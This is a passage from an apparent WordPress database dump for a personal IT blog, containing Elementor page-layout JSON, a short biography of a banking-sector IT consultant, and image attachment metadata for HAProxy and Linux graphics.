0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3084,690,'_elementor_pro_version','3.12.3'),
(3085,690,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3087,691,'_wp_attached_file','2022/12/haproxy.png'),
(3088,691,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2000;s:6:\"height\";i:1000;s:4:\"file\";s:19:\"2022/12/haproxy.png\";s:8:\"filesize\";i:67009;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:19:\"haproxy-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11934;}s:5:\"large\";a:5:{s:4:\"file\";s:21:\"haproxy-1024x1000.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1000;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:10270;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:19:\"haproxy-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5634;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:19:\"haproxy-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32534;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:20:\"haproxy-1536x768.png\";s:5:\"width\";i:1536;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:76336;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3089,691,'_wp_attachment_image_alt','haproxy'),
(3091,615,'_thumbnail_id','691'),
(3103,693,'_elementor_edit_mode','builder'),
(3104,693,'_elementor_template_type','wp-page'),
(3105,693,'_elementor_version','3.12.1'),
(3106,693,'_wp_page_template','default'),
(3107,693,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3109,693,'_elementor_pro_version','3.12.3'),
(3110,693,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3111,694,'_elementor_edit_mode','builder'),
(3112,694,'_elementor_template_type','wp-page'),
(3113,694,'_elementor_version','3.12.1'),
(3114,694,'_wp_page_template','default'),
(3115,694,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"_skin\":\"cards\",\"classic_meta_separator\":\"\\/\\/\\/\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\"}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3117,694,'_elementor_pro_version','3.12.3'),
(3118,694,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3119,695,'_elementor_edit_mode','builder'),
(3120,695,'_elementor_template_type','wp-page'),
(3121,695,'_elementor_version','3.12.1'),
(3122,695,'_wp_page_template','default'),
(3123,695,'_elementor_data','[{\"id\":\"14c1d57\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"row\",\"flex_gap\":{\"unit\":\"px\",\"size\":0,\"column\":\"0\",\"row\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"e9b4c22\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":30}},\"elements\":[{\"id\":\"b572b86\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/wp-content\\/uploads\\/2021\\/05\\/1400-02-02-12.02.51.jpg\",\"id\":405,\"size\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_border_border\":\"solid\",\"image_border_radius\":{\"unit\":\"%\",\"top\":\"100\",\"right\":\"100\",\"bottom\":\"100\",\"left\":\"100\",\"isLinked\":true},\"image_border_radius_tablet\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true},\"image_border_radius_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"999f467\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p class=\\\"p1\\\">With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.<\\/p>\",\"__globals__\":{\"text_color\":\"globals\\/colors?id=primary\"},\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"42211f7\",\"elType\":\"container\",\"settings\":{\"flex_direction\":\"column\",\"content_width\":\"full\",\"width\":{\"unit\":\"%\",\"size\":70}},\"elements\":[{\"id\":\"dd31a12\",\"elType\":\"widget\",\"settings\":{\"classic_meta_separator\":\"\",\"classic_read_more_text\":\"Read More \\u00bb\",\"cards_meta_data\":[\"date\"],\"cards_meta_separator\":\"\\u2022\",\"cards_read_more_text\":\"Read More \\u00bb\",\"full_content_meta_separator\":\"\\/\\/\\/\",\"pagination_page_limit\":\"5\",\"pagination_prev_label\":\"« Previous\",\"pagination_next_label\":\"Next »\",\"text\":\"Load More\",\"load_more_no_posts_custom_message\":\"No more posts to show\",\"cards_columns\":\"1\",\"cards_posts_per_page\":3,\"cards_card_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"__globals__\":{\"cards_card_bg_color\":\"globals\\/colors?id=text\",\"classic_box_bg_color\":\"globals\\/colors?id=text\",\"classic_title_color\":\"globals\\/colors?id=secondary\"},\"classic_columns\":\"1\",\"classic_thumbnail\":\"left\",\"classic_item_ratio\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"classic_image_width\":{\"unit\":\"%\",\"size\":25,\"sizes\":[]},\"classic_meta_data\":[\"date\"],\"classic_column_gap\":{\"unit\":\"px\",\"size\":32,\"sizes\":[]},\"classic_row_gap\":{\"unit\":\"px\",\"size\":23,\"sizes\":[]},\"classic_box_border_radius\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"classic_img_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"posts\"}],\"isInner\":true}],\"isInner\":false},{\"id\":\"bbad01a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"9301569\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"4fc952c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Databases01-e1621614447218.jpg\",\"id\":428},\"image_size\":\"full\",\"align\":\"center\",\"caption\":\"Database\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/database\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"},\"_mask_shape\":\"flower\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"a6496af\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"cd5a844\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_OS01-e1621627479921.jpg\",\"id\":464},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/os\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4f40c24\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"background_position\":\"center center\",\"background_attachment\":\"fixed\",\"background_size\":\"auto\"},\"elements\":[{\"id\":\"3bc2497\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog_new\\/wp-content\\/uploads\\/2021\\/05\\/Buttons_Security01-e1621661226935.jpg\",\"id\":515},\"image_size\":\"full\",\"align\":\"center\",\"link_to\":\"custom\",\"link\":{\"url\":\"http:\\/\\/ictbank.ir\\/blog\\/category\\/security\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"image_border_border\":\"groove\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"1\",\"bottom\":\"1\",\"left\":\"1\",\"isLinked\":true},\"image_border_radius\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"image_box_shadow_box_shadow_type\":\"yes\",\"image_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.89)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),
(3125,695,'_elementor_pro_version','3.12.3'),
(3126,695,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),
(3128,696,'_wp_attached_file','2022/02/linux.png'),
(3129,696,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:3840;s:6:\"height\";i:2160;s:4:\"file\";s:17:\"2022/02/linux.png\";s:8:\"filesize\";i:145726;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"linux-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32704;}s:5:\"large\";a:5:{s:4:\"file\";s:19:\"linux-1024x1024.png\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:208693;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"linux-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:12452;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"linux-768x768.png\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:136468;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"linux-1536x864.png\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:164316;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:19:\"linux-2048x1152.png\";s:5:\"width\";i:2048;s:6:\"height\";i:1152;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:280712;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3130,696,'_wp_attachment_image_alt','Linux'),
